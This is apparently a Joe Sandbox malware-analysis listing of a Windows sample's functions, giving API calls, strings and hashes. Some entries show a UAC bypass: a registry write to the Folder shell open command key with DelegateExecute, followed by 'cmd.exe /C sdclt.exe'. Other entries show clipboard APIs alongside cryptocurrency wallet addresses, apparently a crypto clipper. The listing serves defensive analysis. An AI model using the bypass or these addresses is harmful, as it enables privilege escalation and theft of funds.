Associated: 0000002A.00000002.644332130.0000000000F36000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 0000002A.00000002.644814910.0000000000F38000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_f20000_MfU3390p.jbxd

Similarity

API ID: Process$OpenToken$ChangeClipboardCloseCreateCurrentFileFindInformationModuleNameNotificationSleep___tlregdtor
String ID: 0xB9ac646751eeaC4c3A9590890EFC8a0FFF564aba$1JDnBLMbGApADkjdvF3hBx1EAxgR6e8oXB$47g94vAnkNu6zukh16J8NPj4bFxTu4EFM9iJ2zkuamnC7CgAAEZB1y8MfuELbaooyWewPSJ2xibhtZvKRYndE3QrSe7Z4Jk$D$DH^.$DJCsr3DybFwksqdu8vpkw6iGK68zkeuX1i$LTCPKXuKtmwEKxqex7y5Sgt89z3pWJ9zFZ$P^w$Rz(C$TSFzn2Z15Moi4CimtErcjt5PetMeqv5spX$bc1q$bc1qyjnkqksy5pu9822xcuap4k95wnkq0w2kfu95nv$ltc1$ltc1qzhcqd8dwhttywhgcmwn8duemqu272djelpwwxr$pGt$qzgxexcalkzzj4ead36uvhhaceuyaujpsswn9ncnzn$rwtNuiPtKMEBriMowNv8NKQCHV967gm9Pi
API String ID: 141524845-1369504979
Opcode ID: 0567fad593257414ffbf62861e76cfaa13585e2dfdd534ffc2431fab2276b4d7
Instruction ID: bf8c50fa0df9d50424a8510685fbc97bc59bff6caa118c99b8bd4c66c86ea36f
Opcode Fuzzy Hash: 0567fad593257414ffbf62861e76cfaa13585e2dfdd534ffc2431fab2276b4d7
Instruction Fuzzy Hash: 3C423032E042618BD724CF18D490B6AB7F2FFA9324F1945ADE8865B311D731ED82DB85

Uniqueness

Uniqueness Score: -1.00%

Function 00F22929 Relevance: 1.5, APIs: 1, Instructions: 3
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetUnhandledExceptionFilter.KERNELBASE(Function_00002935,00F2228A), ref: 00F2292E

Memory Dump Source

Source File: 0000002A.00000002.635856090.0000000000F21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00F20000, based on PE: true

Associated: 0000002A.00000002.635281641.0000000000F20000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000002A.00000002.640437124.0000000000F2F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000002A.00000002.644332130.0000000000F36000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 0000002A.00000002.644814910.0000000000F38000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_f20000_MfU3390p.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 1e77f5d72639562728f2e43cb210cfc62d5b1b8a4109642e8b5c46209a5dca08
Instruction ID: 076b8e11864ca73240cb19ba6a11af7edb9c8f049ac748a6d3b64eedd3325817
Opcode Fuzzy Hash: 1e77f5d72639562728f2e43cb210cfc62d5b1b8a4109642e8b5c46209a5dca08
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 00F27FAB Relevance: 3.0, APIs: 2, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetEnvironmentStringsW.KERNEL32(?,00F25591), ref: 00F27FAE
FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,00F25591), ref: 00F27FED

Memory Dump Source

Source File: 0000002A.00000002.635856090.0000000000F21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00F20000, based on PE: true

Associated: 0000002A.00000002.635281641.0000000000F20000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000002A.00000002.640437124.0000000000F2F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000002A.00000002.644332130.0000000000F36000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 0000002A.00000002.644814910.0000000000F38000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_f20000_MfU3390p.jbxd

Similarity

API ID: EnvironmentStrings$Free
String ID:
API String ID: 3328510275-0
Opcode ID: 7f03f497fd6df636e3b2b99ea9859a1e3518ce5c681b06898f4db7f613c77cd8
Instruction ID: 9bebf6a3b0c591399ee0089166b409b6d4711ca75f56da0334f344bf97af2a04
Opcode Fuzzy Hash: 7f03f497fd6df636e3b2b99ea9859a1e3518ce5c681b06898f4db7f613c77cd8
Instruction Fuzzy Hash: BBE09B3B90D73127912132387C4ADAB361DCFC67757150229F81595285AE184D0664F5

Uniqueness

Uniqueness Score: -1.00%

Function 00F27009 Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000008,?,?,?,00F26A86,00000001,00000364,?,00000006,000000FF,?,00F26FFB,00F2659F,?,?,00F2219B), ref: 00F2704A

Memory Dump Source

Source File: 0000002A.00000002.635856090.0000000000F21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00F20000, based on PE: true

Associated: 0000002A.00000002.635281641.0000000000F20000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000002A.00000002.640437124.0000000000F2F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000002A.00000002.644332130.0000000000F36000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 0000002A.00000002.644814910.0000000000F38000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_f20000_MfU3390p.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: a75d8ea8a4552f1b8ebfc3d168fa777539a63e999e592daeb51c61ede4c713a1
Instruction ID: 2cccde1bb1032dc4f0270ac4b6a9861cad4da7abdf7c8371df52080c7e19c1eb
Opcode Fuzzy Hash: a75d8ea8a4552f1b8ebfc3d168fa777539a63e999e592daeb51c61ede4c713a1
Instruction Fuzzy Hash: A6F0B4329083396B9B31BBA6BC05B5B7748EB40BB0B148021BC14E6181DB34DC0876E0

Uniqueness

Uniqueness Score: -1.00%

Function 00F2655C Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000000,?,?,?,00F2219B,00000080,00000150,74E04770,?,00F22057,00F2DFA0), ref: 00F2658E

Memory Dump Source

Source File: 0000002A.00000002.635856090.0000000000F21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00F20000, based on PE: true

Associated: 0000002A.00000002.635281641.0000000000F20000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000002A.00000002.640437124.0000000000F2F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000002A.00000002.644332130.0000000000F36000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 0000002A.00000002.644814910.0000000000F38000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_f20000_MfU3390p.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 93fb63fbee5f6fe8640de28ba59e6e65dd04c99e78d95303585891baf443db1e
Instruction ID: c690f377a9cc9aaee15b0919c9030d90f6a013f74f5eee607657c9a9db5caf1f
Opcode Fuzzy Hash: 93fb63fbee5f6fe8640de28ba59e6e65dd04c99e78d95303585891baf443db1e
Instruction Fuzzy Hash: 9AE0ED7294633956DA3127AABC02B9A3748EF413B0F2C0120BC16D6188DF64DC00B1F0

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00F213B0 Relevance: 30.0, APIs: 13, Strings: 4, Instructions: 241
registrysleepprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeSecurityDescriptor.ADVAPI32(?,00000001,?,?,?,?,?,00000000), ref: 00F213FD
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,00000000,00000000,?,?,?,?,?,00000000), ref: 00F21411
RegCreateKeyExA.ADVAPI32(80000001,Software\Classes\Folder\shell\open\command,00000000,00000000,00000000,00020006,0000000C,?,?,?,?,?,?,?,00000000), ref: 00F21450
RegCloseKey.ADVAPI32(?,?,?,?,?,?,00000000), ref: 00F2145D
SetLastError.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00F21466
GetModuleFileNameA.KERNEL32(00000000,?,00000400,?,?,?,?,?,00000000), ref: 00F214B9
GetCurrentProcess.KERNEL32(?,?,?,?,?,00000000), ref: 00F214E5
IsWow64Process.KERNEL32(00000000,00000000,?,?,?,?,?,00000000), ref: 00F214F0
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,?,?,?,?,00000000), ref: 00F215E0
Sleep.KERNEL32(00001388,?,?,?,?,?,00000000), ref: 00F215EB
CloseHandle.KERNEL32(?,?,?,?,?,?,00000000), ref: 00F2169B
CloseHandle.KERNEL32(?,?,?,?,?,?,00000000), ref: 00F216A0
RegDeleteKeyA.ADVAPI32(80000001,Software\Classes\Folder\shell\open\command), ref: 00F216AC

Strings

DelegateExecute, xrefs: 00F214D4
0Lqt, xrefs: 00F21466
Software\Classes\Folder\shell\open\command, xrefs: 00F21446, 00F216A2
cmd.exe /C sdclt.exe, xrefs: 00F215A1

Memory Dump Source

Source File: 0000002A.00000002.635856090.0000000000F21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00F20000, based on PE: true

Associated: 0000002A.00000002.635281641.0000000000F20000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000002A.00000002.640437124.0000000000F2F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000002A.00000002.644332130.0000000000F36000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 0000002A.00000002.644814910.0000000000F38000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_f20000_MfU3390p.jbxd

Similarity

API ID: CloseProcess$CreateDescriptorHandleSecurity$CurrentDaclDeleteErrorFileInitializeLastModuleNameSleepWow64
String ID: 0Lqt$DelegateExecute$Software\Classes\Folder\shell\open\command$cmd.exe /C sdclt.exe
API String ID: 839393932-3794622580
Opcode ID: 3f65ff2531717b8673998ec0a702f7e795e8c23edc04f0c67aa3f300be048fbe
Instruction ID: b6906f2a8ab29fb4c0c61d4fb4c9d33b8fe9dd63dffcf3e9e141df13261eeba9
Opcode Fuzzy Hash: 3f65ff2531717b8673998ec0a702f7e795e8c23edc04f0c67aa3f300be048fbe
Instruction Fuzzy Hash: 22A1BA31E00229DFDB24CF54D884FADB7B5FF58714F1881A9E905AB251EB70AA49DF80

Uniqueness

Uniqueness Score: -1.00%

Function 00F22795 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00F227A1
IsDebuggerPresent.KERNEL32 ref: 00F2286D
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00F2288D
UnhandledExceptionFilter.KERNEL32(?), ref: 00F22897

Strings

`Vqt, xrefs: 00F2286D

Memory Dump Source

Source File: 0000002A.00000002.635856090.0000000000F21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00F20000, based on PE: true

Associated: 0000002A.00000002.635281641.0000000000F20000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000002A.00000002.640437124.0000000000F2F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000002A.00000002.644332130.0000000000F36000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 0000002A.00000002.644814910.0000000000F38000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_f20000_MfU3390p.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID: `Vqt
API String ID: 254469556-320833423
Opcode ID: 5ffc5cbdff81e8453324e264e72ac550e893e93d3e3e95643ca7f9aa49bdb61f
Instruction ID: 41b7d0cf69a4cfc644b7939adee20c0bf841886d231409530de2f7e92be4218a
Opcode Fuzzy Hash: 5ffc5cbdff81e8453324e264e72ac550e893e93d3e3e95643ca7f9aa49bdb61f
Instruction Fuzzy Hash: 07314D75D0121C9BDB20DF60DD89BCCBBB8BF04704F1041EAE40DAB250EB759A859F45

Uniqueness

Uniqueness Score: -1.00%

Function 00F26BFC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00F26CF4
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00F26CFE
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 00F26D0B

Strings

`Vqt, xrefs: 00F26CF4

Memory Dump Source

Source File: 0000002A.00000002.635856090.0000000000F21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00F20000, based on PE: true

Associated: 0000002A.00000002.635281641.0000000000F20000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000002A.00000002.640437124.0000000000F2F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000002A.00000002.644332130.0000000000F36000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 0000002A.00000002.644814910.0000000000F38000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_f20000_MfU3390p.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID: `Vqt
API String ID: 3906539128-320833423
Opcode ID: 3618e09ab017883e1be42f1bd43f204e148b701b527e7dbf4cbc67d114ebc1c6
Instruction ID: 42fc6e565e8e5ac03dba42f7116d2c6840f19b5455a8652279df2d1280d2c81d
Opcode Fuzzy Hash: 3618e09ab017883e1be42f1bd43f204e148b701b527e7dbf4cbc67d114ebc1c6
Instruction Fuzzy Hash: 2631D274D1122CABCB21DF24ED89B8CBBB8BF08710F5042EAE40CA7251E7349B859F45

Uniqueness

Uniqueness Score: -1.00%

Function 00F22B57 Relevance: 1.6, APIs: 1, Instructions: 144COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00F22B6D

Memory Dump Source

Source File: 0000002A.00000002.635856090.0000000000F21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00F20000, based on PE: true

Associated: 0000002A.00000002.635281641.0000000000F20000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000002A.00000002.640437124.0000000000F2F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000002A.00000002.644332130.0000000000F36000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 0000002A.00000002.644814910.0000000000F38000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_f20000_MfU3390p.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 92bbbddc56e362cb3105c87c866d25d49f55c527703eacb7f259f8fec0dc37c4
Instruction ID: b4a761ad29ff5ca3b17dcb17423754c6085389d137f3794e3d71063666b4193f
Opcode Fuzzy Hash: 92bbbddc56e362cb3105c87c866d25d49f55c527703eacb7f259f8fec0dc37c4
Instruction Fuzzy Hash: B351A0B1D00219ABDB2ACF59E9817AEB7F1FB48334F24C52AC845EB251D774D940EB60

Uniqueness

Uniqueness Score: -1.00%

Function 00F27236 Relevance: 1.6, APIs: 1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002A.00000002.635856090.0000000000F21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00F20000, based on PE: true

Associated: 0000002A.00000002.635281641.0000000000F20000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000002A.00000002.640437124.0000000000F2F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000002A.00000002.644332130.0000000000F36000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 0000002A.00000002.644814910.0000000000F38000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_f20000_MfU3390p.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 047d5a10196e5501892de1db30c40709d49615f17dc88bda9457dfa56978c09a
Instruction ID: dc22690773fc0b9cf3c969cdecaa59ad6f3331eb05ea69ec3cab4c4c0197f66c
Opcode Fuzzy Hash: 047d5a10196e5501892de1db30c40709d49615f17dc88bda9457dfa56978c09a
Instruction Fuzzy Hash: 4431C676904329AFCB20EFA9DC85DBBB77DEB84320F144559F915D7244EA30AD40AB60

Uniqueness

Uniqueness Score: -1.00%

Function 00F21000 Relevance: .3, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002A.00000002.635856090.0000000000F21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00F20000, based on PE: true

Associated: 0000002A.00000002.635281641.0000000000F20000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000002A.00000002.640437124.0000000000F2F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000002A.00000002.644332130.0000000000F36000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 0000002A.00000002.644814910.0000000000F38000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_f20000_MfU3390p.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d042ddab537c17a232720fe2c949296e74d2b92093267da7f7ca2f80484e731e
Instruction ID: 1eadab05a8fa70105803d9a8e386f6c31be3b9421c8b0257cb57e9eecbc8a03c
Opcode Fuzzy Hash: d042ddab537c17a232720fe2c949296e74d2b92093267da7f7ca2f80484e731e
Instruction Fuzzy Hash: 04C1AB35A04266CFCB25CF58C490AA9F3F1FF59754B1A819AD8459F312D731EE06DB80

Uniqueness

Uniqueness Score: -1.00%

Function 00F2809B Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 0000002A.00000002.635856090.0000000000F21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00F20000, based on PE: true

Associated: 0000002A.00000002.635281641.0000000000F20000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000002A.00000002.640437124.0000000000F2F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000002A.00000002.644332130.0000000000F36000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 0000002A.00000002.644814910.0000000000F38000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_f20000_MfU3390p.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 077816b2e3df8536e110d4ed0c2b33023e4f6f66330ea02bc698ef05b15207fb
Instruction ID: bc65f06149326b02eb3fe0e96012462aafe656461715a1a568461183c1b97b3a
Opcode Fuzzy Hash: 077816b2e3df8536e110d4ed0c2b33023e4f6f66330ea02bc698ef05b15207fb
Instruction Fuzzy Hash: 98E08C72912238EBCB14DFCCD90498AF3ECFB44B90B114096B501E3111CA74EE05D7D0

Uniqueness

Uniqueness Score: -1.00%

Function 00F25A50 Relevance: .0, Instructions: 12COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 0000002A.00000002.635856090.0000000000F21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00F20000, based on PE: true

Associated: 0000002A.00000002.635281641.0000000000F20000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000002A.00000002.640437124.0000000000F2F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000002A.00000002.644332130.0000000000F36000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 0000002A.00000002.644814910.0000000000F38000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_f20000_MfU3390p.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f59cf7bacf38dcb81a23b980f3d0a3780d3e4f4770d4200e18f788f530e1af7
Instruction ID: d4b11b80f877395cb265d5ad079b0b69d25726b745dc7b29f95a9399598bab70
Opcode Fuzzy Hash: 7f59cf7bacf38dcb81a23b980f3d0a3780d3e4f4770d4200e18f788f530e1af7
Instruction Fuzzy Hash: 78C08C35481D6046CE29A920A2B23A93356A391FE2F88058CC9030B64AC92E9D86FA00

Uniqueness

Uniqueness Score: -1.00%

Function 00F2397B Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 304
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

IsInExceptionSpec.LIBVCRUNTIME ref: 00F23A78
type_info::operator==.LIBVCRUNTIME ref: 00F23A9A
___TypeMatch.LIBVCRUNTIME ref: 00F23BA9
IsInExceptionSpec.LIBVCRUNTIME ref: 00F23C7B
_UnwindNestedFrames.LIBCMT ref: 00F23CFF
CallUnexpected.LIBVCRUNTIME ref: 00F23D1A

Strings

csm, xrefs: 00F239B8
csm, xrefs: 00F23A25
csm, xrefs: 00F23AD1

Memory Dump Source

Source File: 0000002A.00000002.635856090.0000000000F21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00F20000, based on PE: true

Associated: 0000002A.00000002.635281641.0000000000F20000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000002A.00000002.640437124.0000000000F2F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000002A.00000002.644332130.0000000000F36000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 0000002A.00000002.644814910.0000000000F38000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_f20000_MfU3390p.jbxd

Similarity

API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 2123188842-393685449
Opcode ID: a3eb36af0158b29f31a8c2f5a459a4b9d1927ec44c28a8a3216ce685489f766a
Instruction ID: ad730f3db610d74de0b56fe77a165016ad68871ff3e37d6acdd815b033fda956
Opcode Fuzzy Hash: a3eb36af0158b29f31a8c2f5a459a4b9d1927ec44c28a8a3216ce685489f766a
Instruction Fuzzy Hash: 0CB16CB1C00229AFCF25DFA4E9819AEBBB5FF14320B144159E8116B211D73DDB51EF91

Uniqueness

Uniqueness Score: -1.00%

Function 00F21330 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 57registrystringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32 ref: 00F2133C
RegOpenKeyExA.ADVAPI32(80000001,Software\Classes\Folder\shell\open\command,00000000,00020006,?), ref: 00F21359
SetLastError.KERNEL32(00000000), ref: 00F21364
RegSetValueExA.ADVAPI32(?,?,00000000,00000001,?,00000000), ref: 00F2137D
RegCloseKey.ADVAPI32(?,?,00000000,00000001,?,00000000), ref: 00F21388
SetLastError.KERNEL32(00000000,?,00000000,00000001,?,00000000), ref: 00F21393

Strings

0Lqt, xrefs: 00F21364, 00F21393
Software\Classes\Folder\shell\open\command, xrefs: 00F2134F

Memory Dump Source

Source File: 0000002A.00000002.635856090.0000000000F21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00F20000, based on PE: true

Associated: 0000002A.00000002.635281641.0000000000F20000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000002A.00000002.640437124.0000000000F2F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000002A.00000002.644332130.0000000000F36000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 0000002A.00000002.644814910.0000000000F38000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_f20000_MfU3390p.jbxd

Similarity

API ID: ErrorLast$CloseOpenValuelstrlen
String ID: 0Lqt$Software\Classes\Folder\shell\open\command
API String ID: 1150107030-1597711290
Opcode ID: 673c607944999bf9c5dd885415f9fae048ef69cea608aad038448338b9692377
Instruction ID: 2c1abc8d6e688578aa646ffc56d2ed035dc08bf51cf4821ec0ed63ec25a9b2ef
Opcode Fuzzy Hash: 673c607944999bf9c5dd885415f9fae048ef69cea608aad038448338b9692377
Instruction Fuzzy Hash: E101D632A5122CBBDB309BA6BC49FEBB7ACEB45731F1001B6F908E211196624D0675F4

Uniqueness

Uniqueness Score: -1.00%

Function 00F23644 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00F2363B,00F234AC,00F22979), ref: 00F23652
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00F23660
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00F23679
SetLastError.KERNEL32(00000000,00F2363B,00F234AC,00F22979), ref: 00F236CB

Strings

0Lqt, xrefs: 00F236CB

Memory Dump Source

Source File: 0000002A.00000002.635856090.0000000000F21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00F20000, based on PE: true

Associated: 0000002A.00000002.635281641.0000000000F20000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000002A.00000002.640437124.0000000000F2F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000002A.00000002.644332130.0000000000F36000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 0000002A.00000002.644814910.0000000000F38000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_f20000_MfU3390p.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID: 0Lqt
API String ID: 3852720340-3382947467
Opcode ID: f0339768b2b4a7b352d519d09100227a3f08a7b35e3b3624a9518b2266850a02
Instruction ID: 4d2b8763255e0ee597e121fc6c497e877cb769d2da9478eb793613eb3d641119
Opcode Fuzzy Hash: f0339768b2b4a7b352d519d09100227a3f08a7b35e3b3624a9518b2266850a02
Instruction Fuzzy Hash: B80124B3A193357EE62866B4BC86E663E99EB04B787200239F411D43F2EF994C017144

Uniqueness

Uniqueness Score: -1.00%

Function 00F23130 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00F23167
___except_validate_context_record.LIBVCRUNTIME ref: 00F2316F
_ValidateLocalCookies.LIBCMT ref: 00F231F8
__IsNonwritableInCurrentImage.LIBCMT ref: 00F23223
_ValidateLocalCookies.LIBCMT ref: 00F23278

Strings

csm, xrefs: 00F2320D

Memory Dump Source

Source File: 0000002A.00000002.635856090.0000000000F21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00F20000, based on PE: true

Associated: 0000002A.00000002.635281641.0000000000F20000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000002A.00000002.640437124.0000000000F2F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000002A.00000002.644332130.0000000000F36000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 0000002A.00000002.644814910.0000000000F38000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_f20000_MfU3390p.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: deefbc39d289e01e1cbe1fb3dec27ef8f9007e55f65072ba66528f4254dc04d3
Instruction ID: 6166072dd0b539586a64659159f96403186360678ec2a71f09b1b2f4c9fe50f2
Opcode Fuzzy Hash: deefbc39d289e01e1cbe1fb3dec27ef8f9007e55f65072ba66528f4254dc04d3
Instruction Fuzzy Hash: 2641D274E00228DBCF10DF68EC45A9EBBB5AF45324F148065E814AB392C739AA15EB91

Uniqueness

Uniqueness Score: -1.00%

Function 00F28D18 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,05A5B079,?,00F28E25,?,?,?,00000000), ref: 00F28DD9

Strings

api-ms-, xrefs: 00F28D6F
ext-ms-, xrefs: 00F28D83

Memory Dump Source

Source File: 0000002A.00000002.635856090.0000000000F21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00F20000, based on PE: true

Associated: 0000002A.00000002.635281641.0000000000F20000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000002A.00000002.640437124.0000000000F2F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000002A.00000002.644332130.0000000000F36000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 0000002A.00000002.644814910.0000000000F38000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_f20000_MfU3390p.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: da98b0947b3ae1e3f7fc8becc1ca058787627d13ef5fdfa54a48f836313b74c5
Instruction ID: 8a6b7c69406d678c436000027c04ccce2052ce142e6340064b33fe53556fc649
Opcode Fuzzy Hash: da98b0947b3ae1e3f7fc8becc1ca058787627d13ef5fdfa54a48f836313b74c5
Instruction Fuzzy Hash: CD219376A02239ABCB319B64FC40A5A37699F617F0B640124F906A72D1DF30ED0AF6D0

Uniqueness

Uniqueness Score: -1.00%

Function 00F24722 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

